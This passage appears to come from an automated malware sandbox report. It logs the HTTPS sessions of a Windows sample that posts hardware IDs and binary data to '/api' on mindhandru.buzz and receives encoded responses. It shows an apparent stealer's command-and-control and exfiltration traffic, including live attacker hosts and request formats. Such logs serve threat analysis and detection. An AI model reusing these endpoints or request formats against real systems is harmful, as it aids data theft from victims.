                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y560KMa%2BOzG8%2BXmQrIg4HrJ8HJIMwhZhQAUUN3N0k3F6x8qGY2eKuN2hhOKie0Ay3dSUBGPR0A955D0o00udIGVNGHn6KPQD6nUpwhQmUuLj8VfkHAl%2FxKauxN3mch0X8KU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f87c5219fb242c1-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1692&min_rtt=1685&rtt_var=646&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=946&delivery_rate=1677197&cwnd=242&unsent_bytes=0&cid=a80aa37db30ea2dd&ts=762&x=0"
                                                                                                                2024-12-27 07:59:14 UTC246INData Raw: 33 35 32 65 0d 0a 49 36 77 4b 4f 74 39 5a 71 54 33 6b 69 4b 53 49 4a 7a 35 74 71 43 70 56 2b 65 4d 32 70 67 33 42 74 5a 46 4a 34 67 68 34 35 77 74 59 6a 6e 77 59 35 57 32 46 48 35 66 74 68 72 4a 54 54 42 6a 4e 42 6e 65 59 68 78 53 63 61 36 44 5a 34 69 7a 4f 4b 67 36 4b 4b 52 6e 4b 61 31 61 73 50 49 55 66 67 66 43 47 73 6e 78 46 54 38 31 45 64 38 50 42 55 38 78 76 6f 4e 6e 7a 4b 49 6c 6e 43 49 74 6f 53 38 42 74 55 72 6f 36 7a 56 79 49 35 63 48 74 51 6c 38 48 78 6b 4d 34 6b 59 34 55 69 69 2b 6b 7a 37 4e 7a 77 45 55 64 6b 32 70 75 7a 58 6c 52 2f 53 53 46 52 73 62 74 79 71 6f 64 48 41 7a 4e 53 44 6d 66 68 31 33 4f 5a 61 6e 52 38 69 32 49 65 42 47 42 59 30 76 4f 62 6c 4f 77 4d 39 6c 52 67 75 4c 4b 36 30 68 66 54 34 51 49 4d 49 50 42
                                                                                                                Data Ascii: 352eI6wKOt9ZqT3kiKSIJz5tqCpV+eM2pg3BtZFJ4gh45wtYjnwY5W2FH5fthrJTTBjNBneYhxSca6DZ4izOKg6KKRnKa1asPIUfgfCGsnxFT81Ed8PBU8xvoNnzKIlnCItoS8BtUro6zVyI5cHtQl8HxkM4kY4Uii+kz7NzwEUdk2puzXlR/SSFRsbtyqodHAzNSDmfh13OZanR8i2IeBGBY0vOblOwM9lRguLK60hfT4QIMIPB
                                                                                                                2024-12-27 07:59:14 UTC1369INData Raw: 44 49 51 38 6b 64 54 69 4f 70 56 6e 43 6f 4d 70 58 6f 42 78 47 4c 6f 33 69 77 66 47 34 73 72 6b 51 46 38 41 7a 55 6b 33 69 59 35 55 78 32 65 72 30 2f 6b 6b 6a 32 55 55 6a 32 35 4a 78 32 39 58 75 6a 50 4e 55 49 57 71 69 4b 70 43 52 45 2b 53 43 42 65 4c 67 6c 66 51 59 72 4b 58 37 47 57 5a 4b 68 32 4a 4b 52 6d 4f 62 6c 61 38 4e 73 74 4e 6a 75 48 4e 37 31 64 58 42 73 64 46 4e 35 61 4c 57 38 64 76 70 4e 33 35 4a 49 70 75 46 34 68 76 51 63 34 6f 46 76 30 38 30 78 2f 65 71 75 58 76 56 56 73 44 33 41 6f 4e 32 35 34 61 33 53 2b 6b 32 37 4e 7a 77 47 49 66 68 6d 70 4b 77 57 74 51 74 69 6e 4c 54 59 44 6e 77 2f 68 44 57 51 48 41 53 79 57 52 6a 31 4c 48 5a 71 6a 65 39 69 79 45 4b 6c 54 46 62 6c 6d 4f 4d 42 69 63 4e 73 42 54 6a 50 33 47 71 6c 6f 53 46 6f 70 50 4f 39 76
                                                                                                                Data Ascii: DIQ8kdTiOpVnCoMpXoBxGLo3iwfG4srkQF8AzUk3iY5Ux2er0/kkj2UUj25Jx29XujPNUIWqiKpCRE+SCBeLglfQYrKX7GWZKh2JKRmObla8NstNjuHN71dXBsdFN5aLW8dvpN35JIpuF4hvQc4oFv080x/equXvVVsD3AoN254a3S+k27NzwGIfhmpKwWtQtinLTYDnw/hDWQHASyWRj1LHZqje9iyEKlTFblmOMBicNsBTjP3GqloSFopPO9v
                                                                                                                2024-12-27 07:59:14 UTC1369INData Raw: 71 2b 58 76 57 75 48 63 6c 72 64 4b 57 76 4e 66 46 75 33 65 66 35 63 69 4f 54 42 2f 41 56 44 51 64 4d 49 4d 4a 66 42 44 49 52 69 6f 74 2f 31 4f 59 39 6e 47 59 74 6e 54 73 74 6e 55 4c 30 37 78 6c 71 43 34 63 33 70 53 46 67 64 77 45 67 2f 6e 6f 42 65 7a 69 2f 74 6c 2f 51 7a 77 44 4a 61 74 48 35 4b 6a 46 31 62 73 7a 58 4d 53 63 62 31 69 50 4d 46 57 77 4f 4b 45 48 65 57 69 56 48 42 59 4b 4c 64 2f 53 36 4b 5a 68 4b 4c 61 6c 50 42 62 46 69 78 4d 38 46 53 69 4f 37 4f 34 30 35 58 43 63 70 4a 50 64 76 50 46 4d 4e 33 34 34 2b 7a 48 34 64 6d 46 34 6f 72 64 4d 31 6d 56 72 6f 74 69 30 44 49 38 34 62 74 53 52 78 58 69 6b 51 2b 6d 34 70 65 77 47 2b 6b 32 76 59 6f 68 32 6b 58 67 6d 4e 50 79 57 78 55 74 44 62 4e 58 34 48 75 77 2f 68 41 56 51 50 47 43 48 6e 62 68 6b 79 45
                                                                                                                Data Ascii: q+XvWuHclrdKWvNfFu3ef5ciOTB/AVDQdMIMJfBDIRiot/1OY9nGYtnTstnUL07xlqC4c3pSFgdwEg/noBezi/tl/QzwDJatH5KjF1bszXMScb1iPMFWwOKEHeWiVHBYKLd/S6KZhKLalPBbFixM8FSiO7O405XCcpJPdvPFMN344+zH4dmF4ordM1mVroti0DI84btSRxXikQ+m4pewG+k2vYoh2kXgmNPyWxUtDbNX4Huw/hAVQPGCHnbhkyE
                                                                                                                2024-12-27 07:59:14 UTC1369INData Raw: 51 6e 77 44 4a 61 6a 47 42 54 77 47 5a 52 73 44 33 44 57 49 6a 6e 7a 65 78 4f 57 77 6a 4d 52 54 2b 57 68 46 66 46 61 36 6e 46 38 43 43 4b 5a 78 44 46 4a 77 48 4a 63 42 6a 6c 65 2b 78 54 72 2f 72 64 2b 46 4d 63 45 49 52 52 64 35 79 4e 46 4a 77 76 6f 4e 6a 36 4a 49 68 69 46 59 70 74 54 38 68 75 56 62 67 30 77 55 32 4f 35 4d 76 68 53 6c 63 64 79 6b 55 7a 6c 34 56 63 7a 32 58 6a 6d 62 4d 73 6d 43 70 43 78 56 78 4d 77 57 68 62 71 33 76 55 45 5a 2b 71 77 65 59 46 42 45 2f 47 52 6a 65 55 6a 56 6a 50 5a 36 4c 62 2f 53 79 46 59 78 4b 4e 65 30 44 4b 59 46 6d 7a 4e 4d 70 62 67 2b 2f 43 37 55 46 61 41 49 6f 47 64 35 79 5a 46 4a 77 76 6a 50 44 47 61 61 46 51 57 70 6f 6e 57 49 35 76 56 50 31 6a 69 31 4f 46 35 73 37 6c 51 31 55 44 77 45 45 38 6c 34 70 51 79 47 61 6d 30
                                                                                                                Data Ascii: QnwDJajGBTwGZRsD3DWIjnzexOWwjMRT+WhFfFa6nF8CCKZxDFJwHJcBjle+xTr/rd+FMcEIRRd5yNFJwvoNj6JIhiFYptT8huVbg0wU2O5MvhSlcdykUzl4Vcz2XjmbMsmCpCxVxMwWhbq3vUEZ+qweYFBE/GRjeUjVjPZ6Lb/SyFYxKNe0DKYFmzNMpbg+/C7UFaAIoGd5yZFJwvjPDGaaFQWponWI5vVP1ji1OF5s7lQ1UDwEE8l4pQyGam0
                                                                                                                2024-12-27 07:59:14 UTC1369INData Raw: 73 43 49 4a 67 55 38 42 6c 56 37 55 7a 77 6c 36 43 37 38 76 73 53 56 59 4f 7a 55 59 35 6b 38 45 61 68 47 69 37 6c 36 74 72 6f 58 6f 42 6c 33 39 4d 37 32 56 58 2f 53 53 46 52 73 62 74 79 71 6f 64 48 41 62 59 54 44 71 4a 69 46 50 4b 59 4b 44 46 38 69 61 4c 65 42 32 4b 62 55 62 43 62 6c 65 37 4f 73 35 56 69 75 33 44 34 55 70 51 54 34 51 49 4d 49 50 42 44 49 52 42 71 4d 54 6b 4b 49 35 68 44 4a 34 70 58 6f 42 78 47 4c 6f 33 69 77 66 47 36 63 33 68 51 56 77 44 79 6b 77 36 6d 35 4e 62 77 32 69 71 33 4f 45 68 68 32 30 52 6a 57 4a 4f 79 48 70 55 73 79 6e 4f 54 5a 53 71 69 4b 70 43 52 45 2b 53 43 41 47 63 6b 55 54 48 4c 5a 4c 42 38 44 32 4c 5a 78 62 46 64 67 2f 58 4b 46 2b 78 65 35 4d 66 67 4f 58 50 36 55 70 64 42 73 5a 46 4d 70 4b 45 56 63 4a 72 71 64 33 7a 4c 59
                                                                                                                Data Ascii: sCIJgU8BlV7Uzwl6C78vsSVYOzUY5k8EahGi7l6troXoBl39M72VX/SSFRsbtyqodHAbYTDqJiFPKYKDF8iaLeB2KbUbCble7Os5Viu3D4UpQT4QIMIPBDIRBqMTkKI5hDJ4pXoBxGLo3iwfG6c3hQVwDykw6m5Nbw2iq3OEhh20RjWJOyHpUsynOTZSqiKpCRE+SCAGckUTHLZLB8D2LZxbFdg/XKF+xe5MfgOXP6UpdBsZFMpKEVcJrqd3zLY
                                                                                                                2024-12-27 07:59:14 UTC1369INData Raw: 63 41 48 4a 5a 42 6a 6c 65 38 68 59 68 65 76 4d 34 30 6c 54 43 4d 35 61 50 5a 79 54 56 63 56 6b 72 74 76 7a 4a 6f 31 67 47 34 78 6b 54 63 4e 76 58 37 49 2b 69 78 48 47 37 64 36 71 48 52 77 75 78 30 4d 37 77 4e 73 55 32 79 47 36 6c 2f 51 6e 77 44 4a 61 68 57 4e 45 78 47 56 62 73 6a 6a 5a 58 6f 44 34 78 75 64 50 54 67 58 42 54 54 71 57 6a 46 66 43 61 61 6a 62 34 53 4b 41 61 52 48 46 4a 77 48 4a 63 42 6a 6c 65 2b 68 49 6b 4f 44 42 35 6c 4e 58 44 73 6c 65 4f 6f 76 42 47 6f 52 2b 70 4d 61 7a 63 35 5a 36 44 59 4a 32 44 39 63 6f 58 37 46 37 6b 78 2b 41 34 38 44 74 51 31 49 64 7a 30 34 34 6c 49 68 64 77 47 65 67 31 2f 63 76 68 32 38 5a 69 57 4a 47 7a 57 64 63 74 44 58 43 55 4d 61 6b 68 75 31 64 48 46 65 4b 61 53 79 59 6a 56 6d 45 63 4f 33 4f 73 79 79 4d 4b 6b 4c
                                                                                                                Data Ascii: cAHJZBjle8hYhevM40lTCM5aPZyTVcVkrtvzJo1gG4xkTcNvX7I+ixHG7d6qHRwux0M7wNsU2yG6l/QnwDJahWNExGVbsjjZXoD4xudPTgXBTTqWjFfCaajb4SKAaRHFJwHJcBjle+hIkODB5lNXDsleOovBGoR+pMazc5Z6DYJ2D9coX7F7kx+A48DtQ1Idz044lIhdwGeg1/cvh28ZiWJGzWdctDXCUMakhu1dHFeKaSyYjVmEcO3OsyyMKkL
                                                                                                                2024-12-27 07:59:14 UTC1369INData Raw: 6b 68 54 71 7a 37 4d 53 63 54 66 78 65 52 4c 57 78 6d 4b 56 77 6a 56 77 56 76 65 4c 2f 76 75 36 6d 75 48 5a 6c 72 64 4b 56 54 4a 61 46 2b 6e 4c 63 78 54 6c 2b 48 4c 35 6d 64 54 43 4e 78 4c 4f 4a 69 51 58 59 68 6b 72 70 65 39 61 34 64 79 57 74 30 70 62 73 6c 2b 57 35 49 34 32 6c 62 47 70 49 62 74 55 78 78 58 69 6e 5a 33 69 59 4a 45 78 32 43 79 36 62 4e 7a 6d 56 52 61 6a 6e 39 47 33 6d 74 4f 74 6a 62 48 54 72 69 71 6e 72 34 58 44 6c 32 59 47 69 6a 62 6e 6d 75 4b 4c 36 4b 58 71 78 4b 5a 4b 67 7a 46 4d 52 4f 41 4b 45 72 39 59 34 73 59 68 66 6a 55 37 45 5a 4b 44 49 31 32 43 62 79 58 58 73 4e 2f 70 4d 44 38 61 38 34 71 46 63 55 78 65 49 35 68 58 36 59 71 33 56 4b 57 37 59 62 56 43 78 77 58 69 68 42 33 72 6f 4a 61 79 6d 69 31 78 72 34 4d 6c 6d 41 64 6c 57 35 57
                                                                                                                Data Ascii: khTqz7MScTfxeRLWxmKVwjVwVveL/vu6muHZlrdKVTJaF+nLcxTl+HL5mdTCNxLOJiQXYhkrpe9a4dyWt0pbsl+W5I42lbGpIbtUxxXinZ3iYJEx2Cy6bNzmVRajn9G3mtOtjbHTriqnr4XDl2YGijbnmuKL6KXqxKZKgzFMROAKEr9Y4sYhfjU7EZKDI12CbyXXsN/pMD8a84qFcUxeI5hX6Yq3VKW7YbVCxwXihB3roJaymi1xr4MlmAdlW5W
                                                                                                                2024-12-27 07:59:14 UTC1369INData Raw: 45 31 77 46 2b 42 2b 74 44 78 43 56 51 4d 30 46 49 4a 70 61 70 59 77 6d 69 35 30 50 55 4e 6f 43 70 55 78 57 59 42 6c 6c 45 59 39 58 76 30 45 63 62 79 68 72 49 46 61 51 7a 45 52 6a 43 4e 6b 42 6e 73 54 4a 6e 74 73 51 65 48 66 31 69 78 62 6c 48 66 59 31 57 78 65 34 55 66 67 4b 71 65 75 67 73 63 43 39 73 49 62 38 76 54 44 35 45 38 39 49 65 68 4e 4d 35 7a 57 70 4d 70 47 5a 77 6d 47 4b 39 37 6b 78 2f 42 36 64 54 34 51 31 38 5a 79 51 38 4a 70 61 5a 61 77 32 36 31 78 2b 51 6b 76 6c 51 50 68 6d 64 50 79 58 35 4a 2f 58 57 4c 55 4d 61 79 2f 36 6f 4e 48 44 43 45 43 43 2f 62 32 52 54 78 62 4b 33 5a 39 44 32 52 4a 7a 32 4c 62 6b 44 59 65 45 2b 79 65 34 55 66 67 4b 71 65 75 41 73 63 43 39 73 49 62 38 76 54 44 35 45 38 39 49 65 68 4e 4d 35 7a 57 70 4d 70 47 5a 77 6d 47
                                                                                                                Data Ascii: E1wF+B+tDxCVQM0FIJpapYwmi50PUNoCpUxWYBllEY9Xv0EcbyhrIFaQzERjCNkBnsTJntsQeHf1ixblHfY1Wxe4UfgKqeugscC9sIb8vTD5E89IehNM5zWpMpGZwmGK97kx/B6dT4Q18ZyQ8JpaZaw261x+QkvlQPhmdPyX5J/XWLUMay/6oNHDCECC/b2RTxbK3Z9D2RJz2LbkDYeE+ye4UfgKqeuAscC9sIb8vTD5E89IehNM5zWpMpGZwmG
                                                                                                                2024-12-27 07:59:14 UTC1369INData Raw: 2f 67 66 7a 46 71 67 73 63 41 34 6f 51 64 35 71 4c 52 4d 6c 67 70 4a 76 30 4d 59 63 71 56 4d 56 6e 41 5a 59 6f 57 62 63 72 78 6c 43 42 70 73 44 6b 53 78 77 51 68 46 46 33 6a 63 45 4d 6c 79 48 6a 78 62 4e 7a 77 43 30 5a 6c 33 74 48 7a 58 35 62 2b 67 58 31 63 70 54 74 31 75 6b 48 62 51 4c 4f 58 69 4b 59 6b 56 50 36 55 59 37 46 39 44 75 44 4b 43 75 54 61 6b 48 41 62 78 6a 7a 65 39 4d 66 33 71 72 72 2b 45 4a 4d 44 49 6f 47 64 35 66 42 44 49 52 69 73 64 44 6a 4b 4d 78 74 41 49 49 70 58 6f 42 78 47 4b 74 37 6b 77 7a 49 71 74 53 71 48 52 78 49 78 45 55 32 6d 49 39 58 31 6e 32 6c 31 4f 55 6f 78 31 51 6b 71 48 74 47 33 6d 73 61 6a 44 62 50 53 5a 50 70 31 75 31 37 59 69 4c 59 54 79 65 59 77 33 6a 44 59 71 2f 70 7a 52 79 52 62 51 72 48 54 30 4c 59 61 78 6a 7a 65 39
                                                                                                                Data Ascii: /gfzFqgscA4oQd5qLRMlgpJv0MYcqVMVnAZYoWbcrxlCBpsDkSxwQhFF3jcEMlyHjxbNzwC0Zl3tHzX5b+gX1cpTt1ukHbQLOXiKYkVP6UY7F9DuDKCuTakHAbxjze9Mf3qrr+EJMDIoGd5fBDIRisdDjKMxtAIIpXoBxGKt7kwzIqtSqHRxIxEU2mI9X1n2l1OUox1QkqHtG3msajDbPSZPp1u17YiLYTyeYw3jDYq/pzRyRbQrHT0LYaxjze9


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                2192.168.2.549714172.67.165.1854435632C:\Users\user\Desktop\AaEBZ7icLd.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-27 07:59:16 UTC281OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=2LF9ILW66AEACCQ6TM
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 12835
                                                                                                                Host: mindhandru.buzz
                                                                                                                2024-12-27 07:59:16 UTC12835OUTData Raw: 2d 2d 32 4c 46 39 49 4c 57 36 36 41 45 41 43 43 51 36 54 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 38 46 46 36 45 46 45 39 36 33 36 38 33 31 30 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 32 4c 46 39 49 4c 57 36 36 41 45 41 43 43 51 36 54 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 32 4c 46 39 49 4c 57 36 36 41 45 41 43 43 51 36 54 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f
                                                                                                                Data Ascii: --2LF9ILW66AEACCQ6TMContent-Disposition: form-data; name="hwid"18FF6EFE96368310BEBA0C6A975F1733--2LF9ILW66AEACCQ6TMContent-Disposition: form-data; name="pid"2--2LF9ILW66AEACCQ6TMContent-Disposition: form-data; name="lid"PsFKDg--pablo
                                                                                                                2024-12-27 07:59:17 UTC1127INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 27 Dec 2024 07:59:17 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=7cq1s1qbt4bgp2hfk586f4c0jk; expires=Tue, 22 Apr 2025 01:45:56 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nG79%2BuZZkzO1JMCa0Sk34agezlx7iOnPnkHYM3%2F%2BNq8AyOGBZlha5h9AkA4pj0daAn9AEa0ZnALDnSZEQb1GPLGH2tBy40XE4YWvKV3kq2m6Lg3s856FCPemz7f0PYpkBNc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f87c531ef1543fa-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1732&min_rtt=1713&rtt_var=680&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2837&recv_bytes=13774&delivery_rate=1564844&cwnd=149&unsent_bytes=0&cid=70d9d2b44ce239de&ts=1149&x=0"
                                                                                                                2024-12-27 07:59:17 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                2024-12-27 07:59:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                3192.168.2.549716172.67.165.1854435632C:\Users\user\Desktop\AaEBZ7icLd.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-27 07:59:19 UTC277OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=AGNW0CGYF99SV8
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 15053
                                                                                                                Host: mindhandru.buzz
                                                                                                                2024-12-27 07:59:19 UTC15053OUTData Raw: 2d 2d 41 47 4e 57 30 43 47 59 46 39 39 53 56 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 38 46 46 36 45 46 45 39 36 33 36 38 33 31 30 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 41 47 4e 57 30 43 47 59 46 39 39 53 56 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 41 47 4e 57 30 43 47 59 46 39 39 53 56 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 41 47 4e 57 30 43 47 59
                                                                                                                Data Ascii: --AGNW0CGYF99SV8Content-Disposition: form-data; name="hwid"18FF6EFE96368310BEBA0C6A975F1733--AGNW0CGYF99SV8Content-Disposition: form-data; name="pid"2--AGNW0CGYF99SV8Content-Disposition: form-data; name="lid"PsFKDg--pablo--AGNW0CGY
                                                                                                                2024-12-27 07:59:20 UTC1133INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 27 Dec 2024 07:59:19 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=rblk8pukl2ri7s7j923959l3nk; expires=Tue, 22 Apr 2025 01:45:58 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WrU11zksPpU%2BvH%2FcjDqTFL4spuYoYS13SDkXcbczcWkC85PFpltYUHZ%2FChW54rHDBaQ2cCRq%2BcAYmVaWoR%2FPg1yEhTFulAl1yUg3fcHQIlVjucb1N6N2GKvM05Ad%2BkxyBIc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f87c542de7f440d-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2306&min_rtt=2306&rtt_var=1153&sent=15&recv=20&lost=0&retrans=1&sent_bytes=4212&recv_bytes=15988&delivery_rate=34871&cwnd=177&unsent_bytes=0&cid=2abd17bd73056439&ts=1165&x=0"
                                                                                                                2024-12-27 07:59:20 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                2024-12-27 07:59:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                4192.168.2.549722172.67.165.1854435632C:\Users\user\Desktop\AaEBZ7icLd.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-27 07:59:21 UTC272OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=T6NABLCP2
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 20513
                                                                                                                Host: mindhandru.buzz
                                                                                                                2024-12-27 07:59:21 UTC15331OUTData Raw: 2d 2d 54 36 4e 41 42 4c 43 50 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 38 46 46 36 45 46 45 39 36 33 36 38 33 31 30 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 54 36 4e 41 42 4c 43 50 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 54 36 4e 41 42 4c 43 50 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 54 36 4e 41 42 4c 43 50 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70
                                                                                                                Data Ascii: --T6NABLCP2Content-Disposition: form-data; name="hwid"18FF6EFE96368310BEBA0C6A975F1733--T6NABLCP2Content-Disposition: form-data; name="pid"3--T6NABLCP2Content-Disposition: form-data; name="lid"PsFKDg--pablo--T6NABLCP2Content-Disp
                                                                                                                2024-12-27 07:59:21 UTC5182OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9d 1b 88 82
                                                                                                                Data Ascii: un 4F([:7s~X`nO`i`
                                                                                                                2024-12-27 07:59:22 UTC1132INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 27 Dec 2024 07:59:22 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=gniicbi02o4jgcisa7758fmcta; expires=Tue, 22 Apr 2025 01:46:01 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kWmPQSYpYYAC06ECsEjQ3UJUXLgIBtv5%2BdID2hy13v7gLgx%2FwLIl1%2Fki6qxW90naUTjvp4x3mKRVWhD6FiKuZHh29yyE5Uod6Z7YE%2B8HaqxHCu%2BC2GP3Vdvh58AjUcpAEPQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f87c551f8b8425f-EWR
